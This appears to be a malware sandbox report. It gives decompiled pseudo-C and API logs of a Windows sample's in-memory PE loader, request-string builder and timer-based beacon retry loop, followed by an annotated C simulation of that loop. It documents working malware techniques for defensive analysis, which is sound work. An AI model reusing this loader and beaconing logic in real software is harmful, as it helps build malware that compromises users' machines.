                                      				void** _v12;
                                      				void* _t17;
                                      				long _t23;
                                      				long _t25;
                                      				long _t28;
                                      				void* _t31;
                                      				intOrPtr* _t34;
                                      				void* _t35;
                                      				void** _t36;
                                      				intOrPtr _t38;
                                      
                                      				_t31 = __edx;
                                      				_t35 = __eax;
                                      				_t17 = E10001314( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                      				if(_t17 != 0) {
                                      					_t28 = 8;
                                      					goto L8;
                                      				} else {
                                      					_t34 = _v8;
                                      					_t28 = E100016DB( &_v8, _t34, _t35);
                                      					if(_t28 == 0) {
                                      						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
                                      						_t23 = E10001792(_t34, _t38); // executed
                                      						_t28 = _t23;
                                      						if(_t28 == 0) {
                                      							_t25 = E10001CCA(_t38, _t31, _t34); // executed
                                      							_t28 = _t25;
                                      							if(_t28 == 0) {
                                      								_push(_t25);
                                      								_push(1);
                                      								_push(_t34);
                                      								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
                                      									_t28 = GetLastError();
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_t36 = _v12;
                                      					_t36[6](NtClose( *_t36));
                                      					E100019CF(_t36);
                                      					L8:
                                      					return _t28;
                                      				}
                                      			}

                                      APIs
                                        • Part of subcall function 10001314: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,1000127C,?,?,?,00000002,?,?,?), ref: 10001339
                                        • Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 1000135B
                                        • Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 10001371
                                        • Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 10001387
                                        • Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 1000139D
                                        • Part of subcall function 10001314: GetProcAddress.KERNEL32(00000000,?), ref: 100013B3
                                        • Part of subcall function 100016DB: memcpy.NTDLL(?,00000002,1000128A,?,0000000A,?,?,?,1000128A,?,0000000A,?,?,?,00000002), ref: 10001708
                                        • Part of subcall function 100016DB: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 1000173B
                                      • NtClose.NTDLL(?,?,0000000A,?,?,?,00000002,?,?,?,?), ref: 100012CC
                                        • Part of subcall function 10001792: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 100017C8
                                        • Part of subcall function 10001792: lstrlenA.KERNEL32(00000002), ref: 100017DE
                                        • Part of subcall function 10001792: memset.NTDLL ref: 100017E8
                                        • Part of subcall function 10001792: GetProcAddress.KERNEL32(?,00000002), ref: 1000184B
                                        • Part of subcall function 10001792: lstrlenA.KERNEL32(-00000002), ref: 10001860
                                        • Part of subcall function 10001792: memset.NTDLL ref: 1000186A
                                        • Part of subcall function 10001CCA: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 10001CF8
                                        • Part of subcall function 10001CCA: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001D4F
                                        • Part of subcall function 10001CCA: GetLastError.KERNEL32(?,?), ref: 10001D55
                                      • GetLastError.KERNEL32(?,?,?,?), ref: 100012BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
                                      • String ID:
                                      • API String ID: 2954739140-0
                                      • Opcode ID: 32f32dd5c34fa0179f307d93b3f404df61f7fdc8145abeb24d11dcf21c1c1868
                                      • Instruction ID: cedec957dddc55fc659acb823c96183bf2ba240a57e1fe86eaca9d964e68471b
                                      • Opcode Fuzzy Hash: 32f32dd5c34fa0179f307d93b3f404df61f7fdc8145abeb24d11dcf21c1c1868
                                      • Instruction Fuzzy Hash: 3211A9766006166BF321D7E98C85EDF77FCEF452D4B010528FA01D7645EA60FD1587A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E10001AD1(void** __esi, PVOID* _a4) {
                                      				long _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				long _t13;
                                      
                                      				_v16 = 0;
                                      				asm("stosd");
                                      				_v8 = 0;
                                      				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                      				if(_t13 < 0) {
                                      					_push(_t13);
                                      					return __esi[6]();
                                      				}
                                      				return 0;
                                      			}

                                      APIs
                                      • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001C94,00000002,00000000,?,?,00000000,?,?,10001C94,?), ref: 10001AFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: SectionView
                                      • String ID:
                                      • API String ID: 1323581903-0
                                      • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction ID: 13f28c4cc4fc02fee0a52066f9704316f59fb495cf6e721c0db2f3a3c6bf4340
                                      • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                      • Instruction Fuzzy Hash: 71F082B590020CBFEB119FA4CC84C9FBBBCEB48294B104939B152E1090E3309E088A60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E00FA90BA(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                      				void* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				long _t64;
                                      				intOrPtr _t65;
                                      				intOrPtr _t66;
                                      				intOrPtr _t67;
                                      				intOrPtr _t68;
                                      				intOrPtr _t69;
                                      				void* _t72;
                                      				intOrPtr _t73;
                                      				int _t76;
                                      				void* _t77;
                                      				intOrPtr _t78;
                                      				intOrPtr _t82;
                                      				intOrPtr _t86;
                                      				intOrPtr _t87;
                                      				void* _t89;
                                      				void* _t92;
                                      				intOrPtr _t96;
                                      				intOrPtr _t100;
                                      				intOrPtr* _t102;
                                      				intOrPtr _t108;
                                      				void* _t110;
                                      				intOrPtr _t115;
                                      				signed int _t119;
                                      				char** _t121;
                                      				int _t124;
                                      				signed int _t126;
                                      				intOrPtr* _t127;
                                      				intOrPtr* _t129;
                                      				intOrPtr* _t131;
                                      				intOrPtr* _t133;
                                      				intOrPtr _t136;
                                      				intOrPtr _t139;
                                      				int _t142;
                                      				intOrPtr _t143;
                                      				int _t146;
                                      				void* _t147;
                                      				void* _t148;
                                      				void* _t158;
                                      				int _t161;
                                      				void* _t162;
                                      				void* _t163;
                                      				void* _t164;
                                      				intOrPtr _t165;
                                      				void* _t167;
                                      				long _t171;
                                      				intOrPtr* _t172;
                                      				intOrPtr* _t175;
                                      				void* _t176;
                                      				void* _t178;
                                      				void* _t179;
                                      				void* _t184;
                                      
                                      				_t158 = __edx;
                                      				_t148 = __ecx;
                                      				_t64 = __eax;
                                      				_t147 = _a20;
                                      				_a20 = 8;
                                      				if(__eax == 0) {
                                      					_t64 = GetTickCount();
                                      				}
                                      				_t65 =  *0xfad018; // 0x8a48e7c8
                                      				asm("bswap eax");
                                      				_t66 =  *0xfad014; // 0x5cb11ae7
                                      				asm("bswap eax");
                                      				_t67 =  *0xfad010; // 0x15dc9586
                                      				asm("bswap eax");
                                      				_t68 =  *0xfad00c; // 0x67522d90
                                      				asm("bswap eax");
                                      				_t69 =  *0xfad230; // 0x2a9a5a8
                                      				_t3 = _t69 + 0xfae622; // 0x74666f73
                                      				_t161 = wsprintfA(_t147, _t3, 3, 0x3d13b, _t68, _t67, _t66, _t65,  *0xfad02c,  *0xfad004, _t64);
                                      				_t72 = E00FA7C63();
                                      				_t73 =  *0xfad230; // 0x2a9a5a8
                                      				_t4 = _t73 + 0xfae662; // 0x74707526
                                      				_t76 = wsprintfA(_t161 + _t147, _t4, _t72);
                                      				_t178 = _t176 + 0x38;
                                      				_t162 = _t161 + _t76;
                                      				if(_a8 != 0) {
                                      					_t143 =  *0xfad230; // 0x2a9a5a8
                                      					_t8 = _t143 + 0xfae66d; // 0x732526
                                      					_t146 = wsprintfA(_t162 + _t147, _t8, _a8);
                                      					_t178 = _t178 + 0xc;
                                      					_t162 = _t162 + _t146;
                                      				}
                                      				_t77 = E00FA4930(_t148);
                                      				_t78 =  *0xfad230; // 0x2a9a5a8
                                      				_t10 = _t78 + 0xfae38a; // 0x6d697426
                                      				_t163 = _t162 + wsprintfA(_t162 + _t147, _t10, _t77, _t158);
                                      				_t82 =  *0xfad230; // 0x2a9a5a8
                                      				_t12 = _t82 + 0xfae7b4; // 0x3a48d5c
                                      				_t184 = _a4 - _t12;
                                      				_t14 = _t82 + 0xfae33b; // 0x74636126
                                      				_t160 = 0 | _t184 == 0x00000000;
                                      				_t164 = _t163 + wsprintfA(_t163 + _t147, _t14, _t184 == 0);
                                      				_t86 =  *0xfad278; // 0x3a495e0
                                      				_t179 = _t178 + 0x1c;
                                      				if(_t86 != 0) {
                                      					_t139 =  *0xfad230; // 0x2a9a5a8
                                      					_t18 = _t139 + 0xfae8ea; // 0x3d736f26
                                      					_t142 = wsprintfA(_t164 + _t147, _t18, _t86);
                                      					_t179 = _t179 + 0xc;
                                      					_t164 = _t164 + _t142;
                                      				}
                                      				_t87 =  *0xfad284; // 0x3a495b0
                                      				if(_t87 != 0) {
                                      					_t136 =  *0xfad230; // 0x2a9a5a8
                                      					_t20 = _t136 + 0xfae685; // 0x73797326
                                      					wsprintfA(_t164 + _t147, _t20, _t87);
                                      					_t179 = _t179 + 0xc;
                                      				}
                                      				_t165 =  *0xfad2d4; // 0x3a49630
                                      				_t89 = E00FA66E0(0xfad00a, _t165 + 4);
                                      				_t171 = 0;
                                      				_v12 = _t89;
                                      				if(_t89 == 0) {
                                      					L28:
                                      					RtlFreeHeap( *0xfad1f0, _t171, _t147); // executed
                                      					return _a20;
                                      				} else {
                                      					_t92 = RtlAllocateHeap( *0xfad1f0, 0, 0x800);
                                      					_a8 = _t92;
                                      					if(_t92 == 0) {
                                      						L27:
                                      						HeapFree( *0xfad1f0, _t171, _v12);
                                      						goto L28;
                                      					}
                                      					E00FA28E3(GetTickCount());
                                      					// Take the lock at 0x03A495F0 (RtlEnterCriticalSection / RtlLeaveCriticalSection in the API log below),
                                      					// bump an interlocked counter while holding it, then build the request string.
                                      					_t96 =  *0xfad2d4; // 0x3a49630
                                      					__imp__(_t96 + 0x40); // RtlEnterCriticalSection
                                      					asm("lock xadd [eax], ecx"); // interlocked add on the counter
                                      					_t100 =  *0xfad2d4; // 0x3a49630
                                      					__imp__(_t100 + 0x40); // RtlLeaveCriticalSection
                                      					_t102 =  *0xfad2d4; // 0x3a49630
                                      					_t167 = E00FA49EC(1, _t160, _t147,  *_t102); // strcpy/lstrcat into a new heap string, then StrTrimA with "=" (see subcall APIs)
                                      					_v20 = _t167;
                                      					asm("lock xadd [eax], ecx"); // interlocked decrement of the same counter
                                      					if(_t167 == 0) {
                                      						L26:
                                      						RtlFreeHeap( *0xfad1f0, _t171, _a8); // executed; *0xfad1f0 is the heap handle used throughout the module
                                      						goto L27;
                                      					}
                                      					StrTrimA(_t167, 0xfac2c4); // strip the characters listed at 0xfac2c4 (.rdata) from both ends
                                      					_t108 =  *0xfad230; // 0x2a9a5a8, base of a relocated string block
                                      					_push(_t167);
                                      					_t24 = _t108 + 0xfae2d2; // 0x53002f
                                      					_t110 = E00FA9FA4(_t24); // lstrcpy + lstrcat: joins that string and _t167 into a new buffer
                                      					_v8 = _t110;
                                      					if(_t110 == 0) {
                                      						L25:
                                      						RtlFreeHeap( *0xfad1f0, _t171, _t167); // executed
                                      						goto L26;
                                      					}
                                      					 *_t167 = 0; // first byte cleared before _t167 is appended below
                                      					__imp__(_a8, _v12); // lstrcpy(_a8, _v12) per the API log
                                      					_t172 = __imp__;
                                      					 *_t172(_a8, _v8); // lstrcat(_a8, _v8)
                                      					 *_t172(_a8, _t167); // lstrcat(_a8, _t167)
                                      					_t115 = E00FA8DEA(0, _a8); // ANSI to UTF-16 copy of the assembled string (lstrlen/mbstowcs/memset in the subcall)
                                      					_a4 = _t115;
                                      					if(_t115 == 0) {
                                      						_a20 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                      						L23:
                                      						E00FA54F9();
                                      						L24:
                                      						RtlFreeHeap( *0xfad1f0, 0, _v8); // executed
                                      						_t171 = 0;
                                      						goto L25;
                                      					}
                                      					_t119 = E00FA4759(_t147, 0xffffffffffffffff, _t167,  &_v16); // executed; on success _v16 points to a context holding three interface pointers at +0, +4 and +8
                                      					_a20 = _t119;
                                      					if(_t119 == 0) {
                                      						_t175 = _v16;
                                      						_t126 = E00FA9A14(_t175, _a4, _a12, _a16); // executed; COM call with the wide string (SysAllocString, IUnknown_QueryInterface_Proxy, StrStrIW in the subcall)
                                      						_a20 = _t126;
                                      						_t127 =  *((intOrPtr*)(_t175 + 8));
                                      						 *((intOrPtr*)( *_t127 + 0x80))(_t127); // vtable slot 32 on the object at +8
                                      						_t129 =  *((intOrPtr*)(_t175 + 8));
                                      						 *((intOrPtr*)( *_t129 + 8))(_t129); // vtable slot 2 = IUnknown::Release
                                      						_t131 =  *((intOrPtr*)(_t175 + 4));
                                      						 *((intOrPtr*)( *_t131 + 8))(_t131); // Release
                                      						_t133 =  *_t175;
                                      						 *((intOrPtr*)( *_t133 + 8))(_t133); // Release
                                      						E00FAA07B(_t175); // HeapFree of the context
                                      					}
                                      					if(_a20 != 0x10d2) { // 0x10d2 is a sample-specific status code, also tested in E00FA9C23
                                      						L18:
                                      						if(_a20 == 0) {
                                      							_t121 = _a12;
                                      							if(_t121 != 0) {
                                      								// Convert the UTF-16 result back to ANSI in place; *_a16 is treated as a byte count and halved
                                      								_t168 =  *_t121;
                                      								_t173 =  *_a16;
                                      								wcstombs( *_t121,  *_t121,  *_a16);
                                      								_t124 = E00FA6C66(_t168, _t168, _t173 >> 1);
                                      								_t167 = _v20;
                                      								 *_a16 = _t124;
                                      							}
                                      						}
                                      						goto L21;
                                      					} else {
                                      						if(_a12 != 0) {
                                      							L21:
                                      							E00FAA07B(_a4); // free the wide copy
                                      							if(_a20 == 0 || _a20 == 0x10d2) {
                                      								goto L24;
                                      							} else {
                                      								goto L23;
                                      							}
                                      						}
                                      						_a20 = _a20 & 0x00000000; // 0x10d2 with no output buffer (_a12 == 0) is reported as success
                                      						goto L18;
                                      					}
                                      				}
                                      			}
                                      Instruction addresses for this listing: 0x00fa90ba to 0x00fa93ec (per-line address column)

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00FA90D1
                                      • wsprintfA.USER32 ref: 00FA911E
                                      • wsprintfA.USER32 ref: 00FA913B
                                      • wsprintfA.USER32 ref: 00FA915B
                                      • wsprintfA.USER32 ref: 00FA9179
                                      • wsprintfA.USER32 ref: 00FA919C
                                      • wsprintfA.USER32 ref: 00FA91BD
                                      • wsprintfA.USER32 ref: 00FA91DD
                                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FA920E
                                      • GetTickCount.KERNEL32 ref: 00FA921F
                                      • RtlEnterCriticalSection.NTDLL(03A495F0), ref: 00FA9233
                                      • RtlLeaveCriticalSection.NTDLL(03A495F0), ref: 00FA9251
                                        • Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A17
                                        • Part of subcall function 00FA49EC: lstrlen.KERNEL32(00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A1F
                                        • Part of subcall function 00FA49EC: strcpy.NTDLL ref: 00FA4A36
                                        • Part of subcall function 00FA49EC: lstrcat.KERNEL32(00000000,00000000), ref: 00FA4A41
                                        • Part of subcall function 00FA49EC: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FA3E0F,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA4A5E
                                      • StrTrimA.SHLWAPI(00000000,00FAC2C4,?,03A49630), ref: 00FA9286
                                        • Part of subcall function 00FA9FA4: lstrlen.KERNEL32(00FA3E46,00000000,00000000,00FA3E46,0053002F,00000000), ref: 00FA9FB0
                                        • Part of subcall function 00FA9FA4: lstrlen.KERNEL32(?), ref: 00FA9FB8
                                        • Part of subcall function 00FA9FA4: lstrcpy.KERNEL32(00000000,?), ref: 00FA9FCF
                                        • Part of subcall function 00FA9FA4: lstrcat.KERNEL32(00000000,?), ref: 00FA9FDA
                                      • lstrcpy.KERNEL32(00000000,?), ref: 00FA92B2
                                      • lstrcat.KERNEL32(00000000,?), ref: 00FA92C4
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00FA92CA
                                        • Part of subcall function 00FA8DEA: lstrlen.KERNEL32(?,00FAD2E0,73BB7FC0,00000000,00FA3FBD,?,?,?,?,?,00FA9865,?), ref: 00FA8DF3
                                        • Part of subcall function 00FA8DEA: mbstowcs.NTDLL ref: 00FA8E1A
                                        • Part of subcall function 00FA8DEA: memset.NTDLL ref: 00FA8E2C
                                      • wcstombs.NTDLL ref: 00FA935D
                                        • Part of subcall function 00FA9A14: SysAllocString.OLEAUT32(00000000), ref: 00FA9A55
                                        • Part of subcall function 00FA9A14: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FA9AD7
                                        • Part of subcall function 00FA9A14: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FA9B16
                                        • Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087
                                      • RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00FA939E
                                      • RtlFreeHeap.NTDLL(00000000,00000000,0053002F,00000000), ref: 00FA93AE
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,03A49630), ref: 00FA93BE
                                      • HeapFree.KERNEL32(00000000,?), ref: 00FA93CE
                                      • RtlFreeHeap.NTDLL(00000000,?), ref: 00FA93DC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                      • String ID:
                                      • API String ID: 2871901346-0
                                      • Opcode ID: 8186eb21a2ef00a942a1130cb4f0c7b403442091fd66eec941679cb7e2f688cc
                                      • Instruction ID: 19eec0539b5fa280419557bea6426ec927ffe73bb1809455eff6878a9a8c7301
                                      • Opcode Fuzzy Hash: 8186eb21a2ef00a942a1130cb4f0c7b403442091fd66eec941679cb7e2f688cc
                                      • Instruction Fuzzy Hash: A8A13AF1900209EFCB11DF68DC88EAA3BB9FF4A354B154465F846C7260DB74E951EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E00FA9C23(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				struct %anon52 _v8;
                                      				long _v12;
                                      				char _v16;
                                      				char _v20;
                                      				signed int _v24;
                                      				intOrPtr _v32;
                                      				union _LARGE_INTEGER _v36;
                                      				intOrPtr _v40;
                                      				void* _v44;
                                      				void _v88;
                                      				char _v92;
                                      				struct %anon52 _t46;
                                      				intOrPtr _t51;
                                      				long _t53;
                                      				void* _t54;
                                      				struct %anon52 _t61;
                                      				long _t65;
                                      				signed int _t66;
                                      				void* _t69;
                                      				void* _t71;
                                      				signed int _t72;
                                      				intOrPtr _t74;
                                      				intOrPtr _t76;
                                      				void** _t78;
                                      				void* _t80;
                                      
                                      				_t74 = __edx;
                                      				// _v92.._v88 form three 16-byte slots (48 bytes) that E00FA7790 fills one at a time
                                      				_v92 = 0;
                                      				memset( &_v88, 0, 0x2c);
                                      				_t46 = CreateWaitableTimerA(0, 1, 0); // manual-reset, unnamed timer
                                      				_v44 = _t46;
                                      				if(_t46 == 0) {
                                      					_v8.LowPart = GetLastError();
                                      				} else {
                                      					// _allmul(*0xfad1f8, -10000000): seconds to a negative (relative) due time in 100 ns units
                                      					_push(0xffffffff);
                                      					_push(0xff676980); // -10000000
                                      					_push(0);
                                      					_push( *0xfad1f8); // initial delay, seconds
                                      					_v20 = 0;
                                      					_v16 = 0;
                                      					L00FAAEF0(); // _allmul
                                      					_v36.LowPart = _t46;
                                      					_v32 = _t74; // high dword of the product, returned in EDX
                                      					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                      					// The handle from *0xfad224 sits right after the timer handle, so both are waited on together:
                                      					// 0 (WAIT_OBJECT_0) means the timer fired, anything else ends the loop
                                      					_t51 =  *0xfad224; // 0x298
                                      					_v40 = _t51;
                                      					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                      					_v8.LowPart = _t53;
                                      					if(_t53 == 0) {
                                      						if(_a8 != 0) {
                                      							L4:
                                      							 *0xfad204 = 5; // global mode flag
                                      						} else {
                                      							_t69 = E00FA4B22(); // executed; parses a value with StrToIntExW (see subcall APIs)
                                      							if(_t69 != 0) {
                                      								goto L4;
                                      							}
                                      						}
                                      						_v12 = 0; // slot index 0..2
                                      						L6:
                                      						// Slot 1 is skipped unless bit 0 of *0xfad218 is set
                                      						if(_v12 == 1 && ( *0xfad218 & 0x00000001) == 0) {
                                      							_v12 = 2;
                                      						}
                                      						_t72 = _v12;
                                      						_t58 = _t72 << 4; // 16 bytes per slot
                                      						_t76 = _t80 + (_t72 << 4) - 0x54;
                                      						_t73 = _t72 + 1;
                                      						_v24 = _t72 + 1;
                                      						_t61 = E00FA7790( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed; fills slot _v12
                                      						_v8.LowPart = _t61;
                                      						if(_t61 != 0) {
                                      							goto L17;
                                      						}
                                      						_t66 = _v24;
                                      						_t90 = _t66 - 3;
                                      						_v12 = _t66; // advanced only on success, so a failed slot is retried after the sleep
                                      						if(_t66 != 3) {
                                      							goto L6;
                                      						} else {
                                      							_v8.LowPart = E00FA259A(_t73, _t90,  &_v92, _a4, _a8); // all three slots filled
                                      						}
                                      						goto L12;
                                      						L17:
                                      						__eflags = _t61 - 0x10d2;
                                      						if(_t61 != 0x10d2) {
                                      							// Any other error: sleep *0xfad1fc seconds, then retry
                                      							_push(0xffffffff);
                                      							_push(0xff676980); // -10000000
                                      							_push(0);
                                      							_push( *0xfad1fc);
                                      							goto L21;
                                      						} else {
                                      							__eflags =  *0xfad200; // 0x0
                                      							if(__eflags == 0) {
                                      								goto L12; // 0x10d2 with no long delay configured: leave with that code
                                      							} else {
                                      								// 0x10d2: call E00FA54F9, then sleep *0xfad200 minutes (-600000000 = 60 s in 100 ns units)
                                      								_t61 = E00FA54F9();
                                      								_push(0xffffffff);
                                      								_push(0xdc3cba00); // -600000000
                                      								_push(0);
                                      								_push( *0xfad200);
                                      								L21:
                                      								L00FAAEF0(); // _allmul
                                      								_v36.LowPart = _t61;
                                      								_v32 = _t76; // high dword (EDX)
                                      								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                      								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                      								__eflags = _t65;
                                      								_v8.LowPart = _t65;
                                      								if(_t65 == 0) {
                                      									goto L6; // timer fired: retry the same slot
                                      								} else {
                                      									goto L12; // other handle signalled, or the wait failed
                                      								}
                                      							}
                                      						}
                                      					}
                                      					L12:
                                      					// Free the first pointer of each of the three 16-byte slots
                                      					_t78 =  &_v92;
                                      					_t71 = 3;
                                      					do {
                                      						_t54 =  *_t78;
                                      						if(_t54 != 0) {
                                      							HeapFree( *0xfad1f0, 0, _t54);
                                      						}
                                      						_t78 =  &(_t78[4]);
                                      						_t71 = _t71 - 1;
                                      					} while (_t71 != 0);
                                      					FindCloseChangeNotification(_v44); // executed; closes the timer handle (in kernelbase.dll this export shares CloseHandle's code, so the resolver reports this name)
                                      				}
                                      				return _v8; // 0 on success, otherwise the wait result or error code
                                      			}
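The sleep and retry logic in E00FA9C23 is easier to check once the timer and the subcalls are taken out of it. The C program below is an added example, not code from the sample and not part of the Joe Sandbox output: it models that control flow with the two _allmul multipliers decoded as signed values, the sleeps recorded instead of performed, and E00FA7790 replaced by a scripted list of return codes. The names beacon_config, run_beacon_loop, EXAMPLE_CFG and EXAMPLE_OUTCOMES, and every configuration number used, are assumptions for illustration; the sample's real values live at 0xfad1f8, 0xfad1fc, 0xfad200 and 0xfad218 and are not shown on this page.

```c
/* Added example, not code from the sample or from the report: a host-independent
 * model of the sleep/retry loop in E00FA9C23. Windows timer and wait calls are
 * replaced by a recorded schedule, the per-slot work (E00FA7790) by scripted
 * outcomes. Configuration values are parameters; the numbers in EXAMPLE_CFG and
 * EXAMPLE_OUTCOMES are assumed, not taken from the sample. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The two 64-bit multipliers pushed to _allmul, read as signed values:
 * 0xFF676980 = -10000000  (seconds -> negative, i.e. relative, 100 ns units)
 * 0xDC3CBA00 = -600000000 (minutes -> the same units) */
#define SEC_TO_REL_100NS  (-10000000LL)
#define MIN_TO_REL_100NS  (-600000000LL)
#define ERR_RETRY_LATER   0x10d2u   /* status the sample answers with the long sleep */
#define MAX_EVENTS        32

typedef struct {
    uint32_t initial_delay_s;  /* *0xfad1f8 */
    uint32_t retry_delay_s;    /* *0xfad1fc */
    uint32_t later_delay_min;  /* *0xfad200 */
    uint32_t flags;            /* *0xfad218, bit 0 enables slot 1 */
} beacon_config;

typedef struct {
    int64_t  due[MAX_EVENTS];   /* every due time handed to SetWaitableTimer */
    int      n_due;
    int      slot[MAX_EVENTS];  /* slot number (1..3) passed to each E00FA7790 call */
    int      n_slot;
    int      final_reached;     /* E00FA259A would have been called */
    uint32_t result;            /* what E00FA9C23 would return */
} beacon_trace;

/* _allmul(value, 0, unit_lo, 0xffffffff): zero-extended 32-bit value times a negative 64-bit unit. */
int64_t relative_due_time(uint32_t value, int64_t unit) { return (int64_t)value * unit; }

/* Record a sleep; returns 0 if the timer "fires", 1 if the stop handle (*0xfad224) wins. */
static int sleep_or_stop(beacon_trace *t, int64_t due, int stop_after)
{
    if (t->n_due < MAX_EVENTS) t->due[t->n_due] = due;
    t->n_due++;
    return (t->n_due > stop_after || t->n_due >= MAX_EVENTS) ? 1 : 0;
}

beacon_trace run_beacon_loop(const beacon_config *cfg, const uint32_t *outcomes,
                             int n_outcomes, int stop_after)
{
    beacon_trace t;
    int attempt = 0, slot = 0;   /* slot mirrors _v12 */
    memset(&t, 0, sizeof t);

    /* Initial sleep before the first attempt. */
    if (sleep_or_stop(&t, relative_due_time(cfg->initial_delay_s, SEC_TO_REL_100NS), stop_after)) {
        t.result = 1;  /* WAIT_OBJECT_0 + 1: the stop handle, straight to cleanup */
        return t;
    }
    for (;;) {
        uint32_t rc;
        if (slot == 1 && (cfg->flags & 1u) == 0) slot = 2;   /* L6: slot 1 needs bit 0 */
        if (t.n_slot < MAX_EVENTS) t.slot[t.n_slot] = slot + 1;
        t.n_slot++;
        rc = (attempt < n_outcomes) ? outcomes[attempt] : 0;  /* scripted E00FA7790 */
        attempt++;
        if (rc == 0) {
            if (++slot == 3) { t.final_reached = 1; t.result = 0; return t; }
            continue;
        }
        /* L17: 0x10d2 -> long sleep in minutes if configured, any other error -> short sleep in seconds. */
        if (rc == ERR_RETRY_LATER) {
            if (cfg->later_delay_min == 0) { t.result = rc; return t; }
            if (sleep_or_stop(&t, relative_due_time(cfg->later_delay_min, MIN_TO_REL_100NS), stop_after)) { t.result = 1; return t; }
        } else {
            if (sleep_or_stop(&t, relative_due_time(cfg->retry_delay_s, SEC_TO_REL_100NS), stop_after)) { t.result = 1; return t; }
        }
        /* Timer fired: back to L6 with the same slot index, so the failed slot is retried. */
    }
}

/* Assumed configuration and outcome script (constructed for this example, not from the sample). */
const beacon_config EXAMPLE_CFG = { 300, 60, 5, 0 };
const uint32_t EXAMPLE_OUTCOMES[4] = { 0, 0x10d2, 7, 0 };

int main(void)
{
    beacon_trace t = run_beacon_loop(&EXAMPLE_CFG, EXAMPLE_OUTCOMES, 4, 10);
    for (int i = 0; i < t.n_due && i < MAX_EVENTS; i++)
        printf("sleep %d: due=%lld (%.1f s)\n", i, (long long)t.due[i], -(double)t.due[i] / 1e7);
    for (int i = 0; i < t.n_slot && i < MAX_EVENTS; i++)
        printf("attempt %d: slot %d\n", i, t.slot[i]);
    printf("result=0x%x final=%d\n", t.result, t.final_reached);
    return 0;
}
```

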